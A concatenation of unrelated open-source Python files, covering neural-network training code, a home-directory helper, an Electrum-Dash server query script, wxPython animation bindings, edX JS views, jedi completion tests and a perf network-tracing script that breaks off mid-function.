report
"""
start_time = timeit.default_timer()
if self.data is None:
raise NoDataFoundException
if self.network is None:
raise NoNetworkFoundException
if self.data.valid_set_x is not None:
self.has_validation = True
self.early_stop = early_stop and self.has_validation
################################################
# Compile if not done already
if self.train_func is None:
compile_arg = kwargs.pop('compile_arg', ['train', 'test'])
if self.has_validation:
compile_arg.append('validate')
self.compile(compile_arg=compile_arg)
if unsupervised_training and self.network.has_unsupervised_layer:
self.pretrain()
if save_mode is not None:
if save_mode not in ['end', 'each']:
self.save_mode = 'end'
else:
self.save_mode = save_mode
if self.file is None:
import datetime
self.file = self.name + '_' + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.ym'
if self.file is not None and save_mode is None:
self.save_mode = 'end'
n_train_batches = self.data.train_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
n_test_batches = self.data.test_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
if self.has_validation:
n_valid_batches = self.data.valid_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
train_idx = np.arange(n_train_batches * self.hp.batch_size, dtype='int32')
self.report['test_values'] = []
self.report['validation_values'] = []
################################################
# Training
logger.info('... Training the model')
# early-stopping parameters
patience = self.hp.patience # look at this many batches regardless
patience_increase = 2 # wait this much longer when a new best is found
improvement_threshold = 0.995 # a relative improvement of this much is considered significant
validation_frequency = min(n_train_batches, patience / 2) # go through this many minibatches before checking the network
best_validation_loss = np.inf
best_iter = 0
test_score = 0.
epoch = 0
done_looping = False
while (epoch < self.hp.n_epochs) and (not done_looping):
epoch += 1
if shuffle:
np_rng.shuffle(train_idx)
for minibatch_index in range(n_train_batches):
# train
minibatch_avg_cost = self.train_func(minibatch_index, train_idx)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [self.validate_func(i) for i
in range(n_valid_batches)]
this_validation_loss = np.mean(validation_losses)
logger.info('epoch %i, minibatch %i/%i, validation error %.3f %%' %
(epoch, minibatch_index + 1, n_train_batches, this_validation_loss * 100.))
self.report['validation_values'].append((iter + 1, this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
# improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = [self.test_func(i) for i in range(n_test_batches)]
test_score = np.mean(test_losses)
logger.info(' epoch %i, minibatch %i/%i, test error of best model %.3f %%' %
(epoch, minibatch_index + 1, n_train_batches, test_score * 100.))
self.report['test_values'].append((epoch, test_score * 100))
# save and overwrite each best model
if self.save_mode == 'each':
save_model(self)
logger.info(' Best model saved')
if patience <= iter:
done_looping = True
break
end_time = timeit.default_timer()
# save the final model
if self.save_mode == 'end':
save_model(self)
logger.info(' Final model saved as : ' + self.file)
logger.info('\n Optimization completed. ' + ('Early stopped at epoch: %i' % epoch)
if done_looping else 'Optimization completed. ' + ('Trained on all %i epochs' % epoch))
logger.info(' Validation score of %.3f %% obtained at iteration %i, with test performance %.3f %%' %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
# Report
self.report['epoch'] = epoch
self.report['early_stop'] = done_looping
self.report['best_validation'] = best_validation_loss * 100.
self.report['best_iter'] = best_iter + 1
self.report['test_score'] = test_score * 100.
self.report['training_duration'] = format_sec(end_time - start_time)
return self.report
def predict(self, X):
if self.predict_func is None:
self.compile(compile_arg='predict')
return self.predict_func(X)
def to_conf(self, file=None):
"""
Save model as a conf object or conf file
"""
conf = {'model name': self.name,
'hyperparameters': self.hp.to_conf(),
'network': self.network.to_conf(),
'updates': self.updates.__name__,
'data_shape': self.data_shape,
'report': self.report,
'file': self.file}
if file is None:
return conf
else:
with open(file, 'wb') as f:
pickle.dump(conf, f, pickle.HIGHEST_PROTOCOL)
def from_conf(self, conf):
"""
build model from conf object or conf file
"""
if isinstance(conf, str):
with open(conf, 'rb') as f:
_conf = pickle.load(f)
else:
_conf = conf.copy()
self.name = _conf['model name']
self.hp = yadll.hyperparameters.Hyperparameters()
for k, v in _conf['hyperparameters'].items():
self.hp(k, v)
self.network = yadll.network.Network()
self.network.from_conf(_conf['network'])
self.updates = getattr(yadll.updates, _conf['updates'])
self.report = _conf['report']
self.file = _conf['file']
self.data_shape = _conf['data_shape']
| mit |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/traits-4.3.0-py2.7-macosx-10.10-x86_64.egg/traits/util/home_directory.py | 1 | 1435 | #------------------------------------------------------------------------------
# Copyright (c) 2005, 2006 by Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought util package component>
#------------------------------------------------------------------------------
import os
def get_home_directory():
""" Determine the user's home directory."""
# 'HOME' should work on most Unixes, and 'USERPROFILE' works on at
# least Windows XP ;^)
#
# FIXME: Is this really better than the following??
# path = os.path.expanduser('~')
# The above seems to work on both Windows and Unixes though the docs
# indicate it might not work as well on Macs.
for name in ['HOME', 'USERPROFILE']:
if os.environ.has_key(name):
# Make sure that the path ends with a path separator.
path = os.environ[name]
if path[-1] != os.path.sep:
path += os.path.sep
break
# If all else fails, the current directory will do.
else:
path = ''
return path
| gpl-2.0 |
mazaclub/electrum-dash | scripts/util.py | 2 | 2083 | import time, electrum, Queue
from electrum_dash import Interface, SimpleConfig
from electrum_dash.network import filter_protocol, parse_servers
# electrum_dash.util.set_verbosity(1)
def get_peers():
# 1. start interface and wait for connection
q = Queue.Queue()
interface = electrum_dash.Interface('ecdsa.net:110:s', q)
interface.start()
i, r = q.get()
if not interface.is_connected():
raise BaseException("not connected")
# 2. get list of peers
interface.send_request({'id':0, 'method':'server.peers.subscribe','params':[]})
i, r = q.get(timeout=10000)
peers = parse_servers(r.get('result'))
peers = filter_protocol(peers,'s')
i.stop()
return peers
def send_request(peers, request):
print "Contacting %d servers"%len(peers)
# start interfaces
q2 = Queue.Queue()
config = SimpleConfig()
interfaces = map(lambda server: Interface(server, q2, config), peers)
reached_servers = []
for i in interfaces:
i.start()
t0 = time.time()
while peers:
try:
i, r = q2.get(timeout=1)
except:
if time.time() - t0 > 10:
print "timeout"
break
else:
continue
if i.server in peers:
peers.remove(i.server)
if i.is_connected():
reached_servers.append(i)
else:
print "Connection failed:", i.server
print "%d servers could be reached"%len(reached_servers)
results_queue = Queue.Queue()
for i in reached_servers:
i.send_request(request, results_queue)
results = {}
t0 = time.time()
while reached_servers:
try:
i, r = results_queue.get(timeout=1)
except:
if time.time() - t0 > 10:
break
else:
continue
results[i.server] = r.get('result')
reached_servers.remove(i)
i.stop()
for i in reached_servers:
print i.server, "did not answer"
print "%d answers"%len(results)
return results
| gpl-3.0 |
ezequielpereira/Time-Line | libs/wx/animate.py | 10 | 9600 | # This file was created automatically by SWIG 1.3.29.
# Don't modify this file, modify the SWIG interface instead.
"""
Simple animation player classes, including `GIFAnimationCtrl` for displaying
animated GIF files
"""
import _animate
import new
new_instancemethod = new.instancemethod
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'PySwigObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static) or hasattr(self,name):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
import _core
import wx
__docfilter__ = wx._core.__DocFilter(globals())
ANIM_UNSPECIFIED = _animate.ANIM_UNSPECIFIED
ANIM_DONOTREMOVE = _animate.ANIM_DONOTREMOVE
ANIM_TOBACKGROUND = _animate.ANIM_TOBACKGROUND
ANIM_TOPREVIOUS = _animate.ANIM_TOPREVIOUS
ANIMATION_TYPE_INVALID = _animate.ANIMATION_TYPE_INVALID
ANIMATION_TYPE_GIF = _animate.ANIMATION_TYPE_GIF
ANIMATION_TYPE_ANI = _animate.ANIMATION_TYPE_ANI
ANIMATION_TYPE_ANY = _animate.ANIMATION_TYPE_ANY
class AnimationBase(_core.Object):
"""Proxy of C++ AnimationBase class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
__swig_destroy__ = _animate.delete_AnimationBase
__del__ = lambda self : None;
def IsOk(*args, **kwargs):
"""IsOk(self) -> bool"""
return _animate.AnimationBase_IsOk(*args, **kwargs)
def GetDelay(*args, **kwargs):
"""GetDelay(self, int i) -> int"""
return _animate.AnimationBase_GetDelay(*args, **kwargs)
def GetFrameCount(*args, **kwargs):
"""GetFrameCount(self) -> int"""
return _animate.AnimationBase_GetFrameCount(*args, **kwargs)
def GetFrame(*args, **kwargs):
"""GetFrame(self, int i) -> Image"""
return _animate.AnimationBase_GetFrame(*args, **kwargs)
def GetSize(*args, **kwargs):
"""GetSize(self) -> Size"""
return _animate.AnimationBase_GetSize(*args, **kwargs)
def LoadFile(*args, **kwargs):
"""LoadFile(self, String name, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationBase_LoadFile(*args, **kwargs)
def Load(*args, **kwargs):
"""Load(self, InputStream stream, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationBase_Load(*args, **kwargs)
_animate.AnimationBase_swigregister(AnimationBase)
cvar = _animate.cvar
AnimationCtrlNameStr = cvar.AnimationCtrlNameStr
class Animation(AnimationBase):
"""Proxy of C++ Animation class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Animation
__init__(self, String name, int type=ANIMATION_TYPE_ANY) -> Animation
"""
_animate.Animation_swiginit(self,_animate.new_Animation(*args))
__swig_destroy__ = _animate.delete_Animation
__del__ = lambda self : None;
def GetFramePosition(*args, **kwargs):
"""GetFramePosition(self, int frame) -> Point"""
return _animate.Animation_GetFramePosition(*args, **kwargs)
def GetFrameSize(*args, **kwargs):
"""GetFrameSize(self, int frame) -> Size"""
return _animate.Animation_GetFrameSize(*args, **kwargs)
def GetDisposalMethod(*args, **kwargs):
"""GetDisposalMethod(self, int frame) -> int"""
return _animate.Animation_GetDisposalMethod(*args, **kwargs)
def GetTransparentColour(*args, **kwargs):
"""GetTransparentColour(self, int frame) -> Colour"""
return _animate.Animation_GetTransparentColour(*args, **kwargs)
def GetBackgroundColour(*args, **kwargs):
"""GetBackgroundColour(self) -> Colour"""
return _animate.Animation_GetBackgroundColour(*args, **kwargs)
_animate.Animation_swigregister(Animation)
AC_NO_AUTORESIZE = _animate.AC_NO_AUTORESIZE
AC_DEFAULT_STYLE = _animate.AC_DEFAULT_STYLE
AN_FIT_ANIMATION = _animate.AN_FIT_ANIMATION
class AnimationCtrlBase(_core.Control):
"""Proxy of C++ AnimationCtrlBase class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
def LoadFile(*args, **kwargs):
"""LoadFile(self, String filename, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationCtrlBase_LoadFile(*args, **kwargs)
def SetAnimation(*args, **kwargs):
"""SetAnimation(self, Animation anim)"""
return _animate.AnimationCtrlBase_SetAnimation(*args, **kwargs)
def GetAnimation(*args, **kwargs):
"""GetAnimation(self) -> Animation"""
return _animate.AnimationCtrlBase_GetAnimation(*args, **kwargs)
Animation = property(GetAnimation,SetAnimation)
def Play(*args, **kwargs):
"""Play(self) -> bool"""
return _animate.AnimationCtrlBase_Play(*args, **kwargs)
def Stop(*args, **kwargs):
"""Stop(self)"""
return _animate.AnimationCtrlBase_Stop(*args, **kwargs)
def IsPlaying(*args, **kwargs):
"""IsPlaying(self) -> bool"""
return _animate.AnimationCtrlBase_IsPlaying(*args, **kwargs)
def SetInactiveBitmap(*args, **kwargs):
"""SetInactiveBitmap(self, Bitmap bmp)"""
return _animate.AnimationCtrlBase_SetInactiveBitmap(*args, **kwargs)
def GetInactiveBitmap(*args, **kwargs):
"""GetInactiveBitmap(self) -> Bitmap"""
return _animate.AnimationCtrlBase_GetInactiveBitmap(*args, **kwargs)
InactiveBitmap = property(GetInactiveBitmap,SetInactiveBitmap)
_animate.AnimationCtrlBase_swigregister(AnimationCtrlBase)
NullAnimation = cvar.NullAnimation
class AnimationCtrl(AnimationCtrlBase):
"""Proxy of C++ AnimationCtrl class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""
__init__(self, Window parent, int id=-1, Animation anim=NullAnimation,
Point pos=DefaultPosition, Size size=DefaultSize,
long style=AC_DEFAULT_STYLE, String name=AnimationCtrlNameStr) -> AnimationCtrl
"""
_animate.AnimationCtrl_swiginit(self,_animate.new_AnimationCtrl(*args, **kwargs))
self._setOORInfo(self)
def Create(*args, **kwargs):
"""
Create(self, Window parent, int id, Animation anim=NullAnimation,
Point pos=DefaultPosition, Size size=DefaultSize,
long style=AC_DEFAULT_STYLE, String name=AnimationCtrlNameStr) -> bool
"""
return _animate.AnimationCtrl_Create(*args, **kwargs)
def SetUseWindowBackgroundColour(*args, **kwargs):
"""SetUseWindowBackgroundColour(self, bool useWinBackground=True)"""
return _animate.AnimationCtrl_SetUseWindowBackgroundColour(*args, **kwargs)
def IsUsingWindowBackgroundColour(*args, **kwargs):
"""IsUsingWindowBackgroundColour(self) -> bool"""
return _animate.AnimationCtrl_IsUsingWindowBackgroundColour(*args, **kwargs)
def DrawCurrentFrame(*args, **kwargs):
"""DrawCurrentFrame(self, DC dc)"""
return _animate.AnimationCtrl_DrawCurrentFrame(*args, **kwargs)
def GetBackingStore(*args, **kwargs):
"""GetBackingStore(self) -> Bitmap"""
return _animate.AnimationCtrl_GetBackingStore(*args, **kwargs)
_animate.AnimationCtrl_swigregister(AnimationCtrl)
def PreAnimationCtrl(*args, **kwargs):
"""PreAnimationCtrl() -> AnimationCtrl"""
val = _animate.new_PreAnimationCtrl(*args, **kwargs)
return val
class GIFAnimationCtrl(AnimationCtrl):
"""
Backwards compatibility class for AnimationCtrl.
"""
def __init__(self, parent, id=-1, filename="",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=AC_DEFAULT_STYLE,
name="gifAnimation"):
AnimationCtrl.__init__(self, parent, id, NullAnimation, pos, size, style, name)
self.LoadFile(filename)
def GetPlayer(self):
return self
def UseBackgroundColour(self, useBackground=True):
self.SetUseWindowBackgroundColour(useBackground)
| gpl-3.0 |
chudaol/edx-platform | common/djangoapps/pipeline_js/views.py | 162 | 1215 | """
Views for returning XModule JS (used by requirejs)
"""
import json
from django.conf import settings
from django.http import HttpResponse
from staticfiles.storage import staticfiles_storage
from edxmako.shortcuts import render_to_response
def get_xmodule_urls():
"""
Returns a list of the URLs to hit to grab all the XModule JS
"""
if settings.DEBUG:
paths = [path.replace(".coffee", ".js") for path in
settings.PIPELINE_JS['module-js']['source_filenames']]
else:
paths = [settings.PIPELINE_JS['module-js']['output_filename']]
return [staticfiles_storage.url(path) for path in paths]
def xmodule_js_files(request):
"""
View function that returns XModule URLs as a JSON list; meant to be used
as an API
"""
urls = get_xmodule_urls()
return HttpResponse(json.dumps(urls), content_type="application/json")
def requirejs_xmodule(request):
"""
View function that returns a requirejs-wrapped Javascript file that
loads all the XModule URLs; meant to be loaded via requireJS
"""
return render_to_response(
"xmodule.js",
{"urls": get_xmodule_urls()},
content_type="text/javascript",
)
| agpl-3.0 |
blueyed/jedi | test/completion/generators.py | 8 | 1887 | # -----------------
# yield statement
# -----------------
def gen():
yield 1
yield ""
gen_exe = gen()
#? int() str()
next(gen_exe)
#? int() str() list
next(gen_exe, list)
def gen_ret(value):
yield value
#? int()
next(gen_ret(1))
#? []
next(gen_ret())
# -----------------
# generators should not be indexable
# -----------------
def get(param):
yield 1
yield ""
#? []
get()[0]
# -----------------
# __iter__
# -----------------
for a in get():
#? int() str()
a
class Get():
def __iter__(self):
yield 1
yield ""
b = []
for a in Get():
#? int() str()
a
b += [a]
#? list()
b
#? int() str()
b[0]
g = iter(Get())
#? int() str()
next(g)
g = iter([1.0])
#? float()
next(g)
# -----------------
# __next__
# -----------------
class Counter:
def __init__(self, low, high):
self.current = low
self.high = high
def __iter__(self):
return self
def next(self):
""" need to have both __next__ and next, because of py2/3 testing """
return self.__next__()
def __next__(self):
if self.current > self.high:
raise StopIteration
else:
self.current += 1
return self.current - 1
for c in Counter(3, 8):
#? int()
print c
# -----------------
# tuples
# -----------------
def gen():
if a:
yield 1, ""
else:
yield 2, 1.0
a, b = next(gen())
#? int()
a
#? str() float()
b
def simple():
yield 1
yield ''
a, b = simple()
#? int()
a
#? str()
b
# -----------------
# More complicated access
# -----------------
# `close` is a method wrapper.
#? ['__call__']
gen().close.__call__
#?
gen().throw()
#? ['co_consts']
gen().gi_code.co_consts
#? []
gen.gi_code.co_consts
# `send` is also a method wrapper.
#? ['__call__']
gen().send.__call__
#? tuple()
gen().send()
#?
gen()()
| mit |
Hundsbuah/tf700t_kernel | tools/perf/scripts/python/netdev-times.py | 11271 | 15048 | # Display a process of packets and processed time.
# It helps us to investigate networking or network device.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
all_event_list = []; # insert all tracepoint event related with this script
irq_dic = {}; # key is cpu and value is a list which stacks irqs
# which raise NET_RX softirq
net_rx_dic = {}; # key is cpu and value include time of NET_RX softirq-entry
# and a list which stacks receive
receive_hunk_list = []; # a list which include a sequence of receive events
rx_skb_list = []; # received packet list for matching
# skb_copy_datagram_iovec
buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and
# tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
tx_queue_list = []; # list of packets which pass through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # list of packets which is freed
# options
show_tx = 0;
show_rx = 0;
dev = 0; # store a name of device specified by option "dev="
debug = 0;
# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Calculate a time interval(msec) from src(nsec) to dst(nsec)
def diff_msec(src, dst):
return (dst - src) / 1000000.0
# Display a process of transmitting a packet
def print_transmit(hunk):
if dev != 0 and hunk['dev'].find(dev) < 0:
return
print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
(hunk['dev'], hunk['len'],
nsecs_secs(hunk['queue_t']),
nsecs_nsecs(hunk['queue_t'])/1000,
diff_msec(hunk['queue_t'], hunk['xmit_t']),
diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format for displaying rx packet processing
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display a process of received packets and interrputs associated with
# a NET_RX softirq
def print_receive(hunk):
show_hunk = 0
irq_list = hunk['irq_list']
cpu = irq_list[0]['cpu']
base_t = irq_list[0]['irq_ent_t']
# check if this hunk should be showed
if dev != 0:
for i in range(len(irq_list)):
if irq_list[i]['name'].find(dev) >= 0:
show_hunk = 1
break
else:
show_hunk = 1
if show_hunk == 0:
return
print "%d.%06dsec cpu=%d" % \
(nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
for i in range(len(irq_list)):
print PF_IRQ_ENTRY % \
(diff_msec(base_t, irq_list[i]['irq_ent_t']),
irq_list[i]['irq'], irq_list[i]['name'])
print PF_JOINT
irq_event_list = irq_list[i]['event_list']
for j in range(len(irq_event_list)):
irq_event = irq_event_list[j]
if irq_event['event'] == 'netif_rx':
print PF_NET_RX % \
(diff_msec(base_t, irq_event['time']),
irq_event['skbaddr'])
print PF_JOINT
print PF_SOFT_ENTRY % \
diff_msec(base_t, hunk['sirq_ent_t'])
print PF_JOINT
event_list = hunk['event_list']
for i in range(len(event_list)):
event = event_list[i]
if event['event_name'] == 'napi_poll':
print PF_NAPI_POLL % \
(diff_msec(base_t, event['event_t']), event['dev'])
if i == len(event_list) - 1:
print ""
else:
print PF_JOINT
else:
print PF_NET_RECV % \
(diff_msec(base_t, event['event_t']), event['skbaddr'],
event['len'])
if 'comm' in event.keys():
print PF_WJOINT
print PF_CPY_DGRAM % \
(diff_msec(base_t, event['comm_t']),
event['pid'], event['comm'])
elif 'handle' in event.keys():
print PF_WJOINT
if event['handle'] == "kfree_skb":
print PF_KFREE_SKB % \
(diff_msec(base_t,
event['comm_t']),
event['location'])
elif event['handle'] == "consume_skb":
print PF_CONS_SKB % \
diff_msec(base_t,
event['comm_t'])
print PF_JOINT
def trace_begin():
global show_tx
global show_rx
global dev
global debug
for i in range(len(sys.argv)):
if i == 0:
continue
arg = sys.argv[i]
if arg == 'tx':
show_tx = 1
elif arg =='rx':
show_rx = 1
elif arg.find('dev=',0, 4) >= 0:
dev = arg[4:]
elif arg == 'debug':
debug = 1
if show_tx == 0 and show_rx == 0:
show_tx = 1
show_rx = 1
def trace_end():
# order all events in time
all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
b[EINFO_IDX_TIME]))
# process all events
for i in range(len(all_event_list)):
event_info = all_event_list[i]
name = event_info[EINFO_IDX_NAME]
if name == 'irq__softirq_exit':
handle_irq_softirq_exit(event_info)
elif name == 'irq__softirq_entry':
handle_irq_softirq_entry(event_info)
elif name == 'irq__softirq_raise':
handle_irq_softirq_raise(event_info)
elif name == 'irq__irq_handler_entry':
handle_irq_handler_entry(event_info)
elif name == 'irq__irq_handler_exit':
handle_irq_handler_exit(event_info)
elif name == 'napi__napi_poll':
handle_napi_poll(event_info)
elif name == 'net__netif_receive_skb':
handle_netif_receive_skb(event_info)
elif name == 'net__netif_rx':
handle_netif_rx(event_info)
elif name == 'skb__skb_copy_datagram_iovec':
handle_skb_copy_datagram_iovec(event_info)
elif name == 'net__net_dev_queue':
handle_net_dev_queue(event_info)
elif name == 'net__net_dev_xmit':
handle_net_dev_xmit(event_info)
elif name == 'skb__kfree_skb':
handle_kfree_skb(event_info)
elif name == 'skb__consume_skb':
handle_consume_skb(event_info)
# display receive hunks
if show_rx:
for i in range(len(receive_hunk_list)):
print_receive(receive_hunk_list[i])
# display transmit hunks
if show_tx:
print " dev len Qdisc " \
" netdevice free"
for i in range(len(tx_free_list)):
print_transmit(tx_free_list[i])
if debug:
print "debug buffer status"
print "----------------------------"
print "xmit Qdisc:remain:%d overflow:%d" % \
(len(tx_queue_list), of_count_tx_queue_list)
print "xmit netdevice:remain:%d overflow:%d" % \
(len(tx_xmit_list), of_count_tx_xmit_list)
print "receive:remain:%d overflow:%d" % \
(len(rx_skb_list), of_count_rx_skb_list)
# called from perf, when it finds a correspoinding event
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
irq, irq_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
irq, irq_name)
all_event_list.append(event_info)
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret)
all_event_list.append(event_info)
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
napi, dev_name)
all_event_list.append(event_info)
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, rc, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, rc ,dev_name)
all_event_list.append(event_info)
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, protocol, location)
all_event_list.append(event_info)
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr)
all_event_list.append(event_info)
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen)
all_event_list.append(event_info)
def handle_irq_handler_entry(event_info):
(name, context, cpu, time, pid, comm, irq, irq_name) = event_info
if cpu not in irq_dic.keys():
irq_dic[cpu] = []
irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time}
irq_dic[cpu].append(irq_record)
def handle_irq_handler_exit(event_info):
(name, context, cpu, time, pid, comm, irq, ret) = event_info
if cpu not in irq_dic.keys():
return
irq_record = irq_dic[cpu].pop()
if irq != irq_record['irq']:
return
irq_record.update({'irq_ext_t':time})
# if an irq doesn't include NET_RX softirq, drop.
if 'event_list' in irq_record.keys():
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'sirq_raise'})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]}
def handle_irq_softirq_exit(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
irq_list = []
event_list = 0
if cpu in irq_dic.keys():
irq_list = irq_dic[cpu]
del irq_dic[cpu]
if cpu in net_rx_dic.keys():
sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t']
event_list = net_rx_dic[cpu]['event_list']
del net_rx_dic[cpu]
if irq_list == [] or event_list == 0:
return
rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time,
'irq_list':irq_list, 'event_list':event_list}
# merge information realted to a NET_RX softirq
receive_hunk_list.append(rec_data)
def handle_napi_poll(event_info):
(name, context, cpu, time, pid, comm, napi, dev_name) = event_info
if cpu in net_rx_dic.keys():
event_list = net_rx_dic[cpu]['event_list']
rec_data = {'event_name':'napi_poll',
'dev':dev_name, 'event_t':time}
event_list.append(rec_data)
def handle_netif_rx(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'netif_rx',
